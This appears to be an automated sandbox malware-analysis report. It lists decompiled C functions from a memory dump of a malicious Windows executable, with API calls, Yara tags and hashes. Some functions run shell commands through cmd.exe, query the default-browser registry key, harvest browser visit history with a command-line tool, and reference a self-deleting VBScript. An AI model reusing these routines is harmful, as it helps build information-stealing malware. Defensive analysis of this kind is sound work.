				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46a00c; // 0x7df2b874
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = L00440C0D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = L0042E9F4(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = L0042E9F4(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = L0042E9F4(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = L00446905(_t56);
						_t40 = L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = L00446905(_t56);
						L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46a00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                              0x0043c2cd
                              0x0043c2d7
                              0x0043c2db
                              0x0043c2dd
                              0x0043c2e1
                              0x0043c2eb
                              0x0043c2fc
                              0x0043c301
                              0x0043c303
                              0x0043c305
                              0x0043c307
                              0x0043c309
                              0x0043c30d
                              0x0043c3c7
                              0x0043c3d5
                              0x0043c3d7
                              0x0043c3dc
                              0x0043c3e3
                              0x0043c3e5
                              0x0043c3f3
                              0x0043c402
                              0x0043c405
                              0x0043c407
                              0x00000000
                              0x0043c408
                              0x0043c315
                              0x0043c31a
                              0x0043c31f
                              0x0043c321
                              0x0043c321
                              0x0043c323
                              0x0043c328
                              0x0043c32c
                              0x0043c32c
                              0x0043c32f
                              0x0043c34e
                              0x0043c34e
                              0x0043c350
                              0x0043c353
                              0x0043c35c
                              0x0043c35f
                              0x0043c364
                              0x0043c367
                              0x0043c36c
                              0x00000000
                              0x00000000
                              0x0043c36e
                              0x00000000
                              0x0043c331
                              0x0043c331
                              0x0043c333
                              0x0043c33c
                              0x0043c33f
                              0x0043c344
                              0x0043c347
                              0x0043c34c
                              0x0043c376
                              0x0043c379
                              0x0043c37b
                              0x0043c37e
                              0x0043c386
                              0x0043c38c
                              0x0043c393
                              0x0043c395
                              0x0043c39d
                              0x0043c3ac
                              0x0043c3b0
                              0x0043c3b2
                              0x0043c3b5
                              0x00000000
                              0x00000000
                              0x0043c3b7
                              0x0043c3ba
                              0x0043c3bc
                              0x0043c3bc
                              0x0043c3bd
                              0x0043c3bf
                              0x0043c3c2
                              0x00000000
                              0x0043c3bc
                              0x00000000
                              0x0043c34c
                              0x0043c32f
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction ID: b8c2f117a08c9f7e3d0690f36157727bc88d5e2796b8de3530b344be676623de
                              • Opcode Fuzzy Hash: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction Fuzzy Hash: A641F772A002109FCB10DF79C881A6EB3B5EF89314F15816EE915EB341EB34ED01CB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041729F, Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E0041729F(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}












                              0x004172a2
                              0x004172a3
                              0x004172a9
                              0x004172ab
                              0x004172af
                              0x004172b1
                              0x004172b3
                              0x004172cb
                              0x004172d0
                              0x004172b5
                              0x004172b8
                              0x004172c1
                              0x004172c4
                              0x004172ba
                              0x004172bc
                              0x004172bd
                              0x004172bd
                              0x004172b8
                              0x004172e4
                              0x004172e9
                              0x004172f3
                              0x00417320
                              0x00417322
                              0x00417322
                              0x00417325
                              0x0041732b
                              0x00000000
                              0x00417305
                              0x00417306
                              0x00000000
                              0x00417306
                              0x004172eb
                              0x004172eb
                              0x004172eb
                              0x0041732d
                              0x00417333
                              0x00417333

                              APIs
                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F714,00000000,00000000,?,0040B43F,00000000,00000000), ref: 004172DE
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004172FA
                              • CloseHandle.KERNEL32(00000000,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 00417306
                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 00417318
                              • CloseHandle.KERNEL32(00000000,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 00417325
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreatePointerWrite
                              • String ID:
                              • API String ID: 1852769593-0
                              • Opcode ID: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
                              • Instruction ID: ea825e8bd67a10857e8b7964dc2fd0b8df6dfe7544f80a4ef1d900d86e80f7e8
                              • Opcode Fuzzy Hash: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
                              • Instruction Fuzzy Hash: 0E11A371204118BFEB104F64AC89EFB777CEB05365F104266FD25D6280C6748E819668
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044618A, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E0044618A() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00446153(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = L0043E61D(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						L0043EE85(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                              0x00446199
                              0x0044619f
                              0x004461f7
                              0x004461f7
                              0x004461a1
                              0x004461a2
                              0x004461a7
                              0x004461b0
                              0x004461b6
                              0x004461bc
                              0x004461c1
                              0x00000000
                              0x004461c3
                              0x004461c9
                              0x004461ce
                              0x004461ec
                              0x004461e6
                              0x004461e6
                              0x004461e8
                              0x004461e8
                              0x004461ef
                              0x004461f4
                              0x004461c1
                              0x004461fb
                              0x004461fe
                              0x004461fe
                              0x0044620c

                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 00446193
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004461B6
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,0046C500,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004461DC
                              • _free.LIBCMT ref: 004461EF
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004461FE
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                              • String ID:
                              • API String ID: 2278895681-0
                              • Opcode ID: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction ID: a4a757ec6fd77dd09b4353e0e1f60453f24905d0662e5e34b4457866c2e58ca0
                              • Opcode Fuzzy Hash: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction Fuzzy Hash: A901D4B26017117B73211AB76C8CC7B696DDAC7BA6716013EB914C3242DE69CE0281BA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00412092, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00412092(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0040425F(0,  &_a96, L00401F75(L00401E29( &_a16, __edx, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", L00401ECB(E004043E5(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
				L00401ED0();
				L00401ED0();
				L00401E54( &_a16, _t35);
				L00401FA7();
				L00401FA7();
				return 0;
			}




                              0x00412092
                              0x004120ac
                              0x004120b2
                              0x004120d4
                              0x004120de
                              0x00412b2a
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004120D4
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: /C $cmd.exe$open
                              • API String ID: 587946157-3896048727
                              • Opcode ID: 11973db372174fcf02deb38d026be97b5300a590d3a5e83f242000d1361fd6a3
                              • Instruction ID: c2a54c5d25423007233d6e2fd92019bc1db18d9fdb92d93029f1e952cb8c39d0
                              • Opcode Fuzzy Hash: 11973db372174fcf02deb38d026be97b5300a590d3a5e83f242000d1361fd6a3
                              • Instruction Fuzzy Hash: AEF036712083415BC214FB72DC92DAF7398AF90349F50183FB546A21F2EF7C9919865A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041033E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 63%
                              			E0041033E(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x45f714);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040425F(_t17, _t21);
				return _t21;
			}








                              0x0041034c
                              0x0041035b
                              0x00410370
                              0x0041039b
                              0x00410372
                              0x00410383
                              0x0041038c
                              0x00410398
                              0x00410398
                              0x004103a2
                              0x004103ae

                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410368
                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410383
                              • RegCloseKey.ADVAPI32(00000000), ref: 0041038C
                              Strings
                              • http\shell\open\command, xrefs: 0041035E
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: http\shell\open\command
                              • API String ID: 3677997916-1487954565
                              • Opcode ID: c3ece9ae41de18da39866ca09f3ec837f6cd14938ba6571f295f513c724457e9
                              • Instruction ID: 174bb4f21a826f001835e6ed766069888861b3d143c64ebc0b38a31aaf37e10a
                              • Opcode Fuzzy Hash: c3ece9ae41de18da39866ca09f3ec837f6cd14938ba6571f295f513c724457e9
                              • Instruction Fuzzy Hash: 49F0C87150020CFBDB109A95EC09FDFBBBCEB85B02F1000A6B905E2050DA705A8587A8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043B0B1, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E0043B0B1(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0043B1FE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = L00450430(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591c8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x459194;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = L00450430( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = L00450430(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = L00450430(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = L00439E14();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = L00439E14();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043626D();
					goto L11;
				}
				_t71 = L00439E14();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043626D();
				return _t103;
			}
































                              0x0043b0ba
                              0x0043b0bf
                              0x0043b0df
                              0x0043b0e0
                              0x0043b0e2
                              0x0043b0e5
                              0x0043b0e7
                              0x0043b0fa
                              0x0043b0fd
                              0x0043b0ff
                              0x0043b102
                              0x0043b105
                              0x0043b108
                              0x0043b113
                              0x0043b115
                              0x0043b116
                              0x0043b118
                              0x0043b134
                              0x0043b138
                              0x0043b141
                              0x0043b146
                              0x0043b14d
                              0x0043b15a
                              0x0043b15f
                              0x0043b169
                              0x0043b16e
                              0x0043b173
                              0x0043b175
                              0x0043b17c
                              0x0043b17e
                              0x0043b17e
                              0x0043b183
                              0x0043b188
                              0x0043b189
                              0x0043b18c
                              0x0043b194
                              0x0043b194
                              0x0043b195
                              0x0043b1a3
                              0x0043b1ab
                              0x0043b1b8
                              0x0043b1b9
                              0x0043b1c3
                              0x0043b1c9
                              0x0043b1d3
                              0x0043b1da
                              0x0043b1de
                              0x0043b1e2
                              0x0043b1e7
                              0x0043b1eb
                              0x0043b1f3
                              0x0043b1f3
                              0x0043b1f5
                              0x0043b1f8
                              0x00000000
                              0x0043b18e
                              0x0043b18e
                              0x0043b18e
                              0x0043b18f
                              0x0043b18f
                              0x00000000
                              0x0043b18e
                              0x0043b18c
                              0x0043b11a
                              0x0043b123
                              0x0043b123
                              0x0043b12a
                              0x0043b12b
                              0x0043b12d
                              0x0043b12d
                              0x00000000
                              0x0043b12d
                              0x0043b11c
                              0x0043b121
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043b121
                              0x0043b10a
                              0x00000000
                              0x00000000
                              0x0043b10c
                              0x0043b111
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043b111
                              0x0043b0e9
                              0x0043b0f0
                              0x0043b0f1
                              0x0043b0f3
                              0x00000000
                              0x0043b0f3
                              0x0043b0c1
                              0x0043b0c8
                              0x0043b0c9
                              0x0043b0cb
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dfab41341134f6dcce459e2fdfd81568117331f2860a1a7b03757cfc8fe9326c
                              • Instruction ID: fabbc6a6f7032cda4dd40e8c936e700ba33ba9abdb81f3509140ce19fd5ad8dd
                              • Opcode Fuzzy Hash: dfab41341134f6dcce459e2fdfd81568117331f2860a1a7b03757cfc8fe9326c
                              • Instruction Fuzzy Hash: 08410672A00304AFDB249F39CC51BAB7BA9EB8C714F10962FF211DB281D779994187C4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417334, Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E00417334(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					L00402439(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, L00401F75(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}











                              0x00417337
                              0x00417338
                              0x0041733b
                              0x0041733d
                              0x00417357
                              0x0041735c
                              0x0041736e
                              0x00417372
                              0x00417380
                              0x00417393
                              0x00417395
                              0x00417395
                              0x00417398
                              0x0041739e
                              0x0041735e
                              0x0041735e
                              0x0041735e
                              0x004173a5

                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,00408D90), ref: 00417365
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00408D90), ref: 0041738A
                              • CloseHandle.KERNEL32(00000000,00408D90), ref: 00417398
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleReadSize
                              • String ID:
                              • API String ID: 3919263394-0
                              • Opcode ID: 98df5892a511ccc02ddf4b8e33454f1bfa62b64891cfbe56f84ffc5860e86bc6
                              • Instruction ID: 56c905e826b57cd088f8bccfe3f058dde1bc79989e28d4bbb664d7596ff6dfd6
                              • Opcode Fuzzy Hash: 98df5892a511ccc02ddf4b8e33454f1bfa62b64891cfbe56f84ffc5860e86bc6
                              • Instruction Fuzzy Hash: 8C01D671501218BFE7105F61AC89EFF777CEB45799F10016AFC04A3281D6749E019634
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040412D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 90%
                              			E0040412D(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				WCHAR* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020B5(__ebx,  &_v52);
				L00417967( &_v28, 0x30, L00401F75(L004169EB( &_v76)));
				L00401FA7();
				L00401F75(0x46c1a0);
				L00413CCA(L00401ECB(E00403086(_t48,  &_v100, L00404409(_t48,  &_v124, E004043E5(_t48,  &_v148,  &_v692, 0, E0040425F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t84 = 0;
				while(1) {
					_t40 = L00401ECB( &_v28);
					_t80 =  &_v52;
					if(E00417334(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					L00401ED0();
					L00401FA7();
					return _t81;
				}
				E004020CC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				L00404A6E(_t48, 0x46c138, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}
















                              0x0040412d
                              0x00404144
                              0x00404147
                              0x00404150
                              0x0040416a
                              0x00404173
                              0x0040417d
                              0x004041d1
                              0x004041d9
                              0x004041e1
                              0x004041ec
                              0x004041f7
                              0x004041fc
                              0x004041fe
                              0x00404201
                              0x00404206
                              0x00404212
                              0x00000000
                              0x00000000
                              0x00404219
                              0x0040421f
                              0x00404223
                              0x00000000
                              0x00000000
                              0x00404225
                              0x00404247
                              0x0040424a
                              0x00404252
                              0x0040425e
                              0x0040425e
                              0x00404230
                              0x00404235
                              0x0040423f
                              0x00404246
                              0x00404246
                              0x00000000

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404147
                                • Part of subcall function 004169EB: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040B275,.vbs), ref: 00416A12
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(004041D6,?,004041D6,0045F454), ref: 00413CE0
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(0045F454,?,004041D6,0045F454), ref: 00413CE9
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • Sleep.KERNEL32(000000FA,0045F454), ref: 00404219
                              Strings
                              • /sort "Visit Time" /stext ", xrefs: 00404193
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                              • String ID: /sort "Visit Time" /stext "
                              • API String ID: 368326130-1573945896
                              • Opcode ID: 8620ccba64e66514bcd4bbb16099e4372e9d8629654790d9b1500f09994f0856
                              • Instruction ID: 077a0f2c23c77d26b68de5e3cb7190eb75c300570ed309256026d755c7120731
                              • Opcode Fuzzy Hash: 8620ccba64e66514bcd4bbb16099e4372e9d8629654790d9b1500f09994f0856
                              • Instruction Fuzzy Hash: 5A318471A1021857CB14FBB6DC969EE7775AF90309F00007FB506B71E2EF381A4ACA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044132F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                              Download Yara Rule
                              C-Code - Quality: 28%
                              			E0044132F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x46a00c; // 0x7df2b874
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t31 = L00440C46(0x16, "LCMapStringEx", 0x4590ec, 0x4590f4);
				if(_t31 == 0) {
					LCMapStringW(L004413B7(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x45346c(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return L0042F61B(_v8 ^ _t33);
			}







                              0x0044132f
                              0x00441334
                              0x00441335
                              0x0044133c
                              0x0044133f
                              0x00441356
                              0x0044135d
                              0x004413a0
                              0x0044135f
                              0x0044137c
                              0x00441382
                              0x00441382
                              0x004413b4

                              APIs
                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,00428772), ref: 004413A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: String
                              • String ID: LCMapStringEx$@
                              • API String ID: 2568140703-230199810
                              • Opcode ID: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
                              • Instruction ID: 328293ae2da74c3881d3de9e1e1d62cea5772e6c780c88eb29c835c9fd5874b5
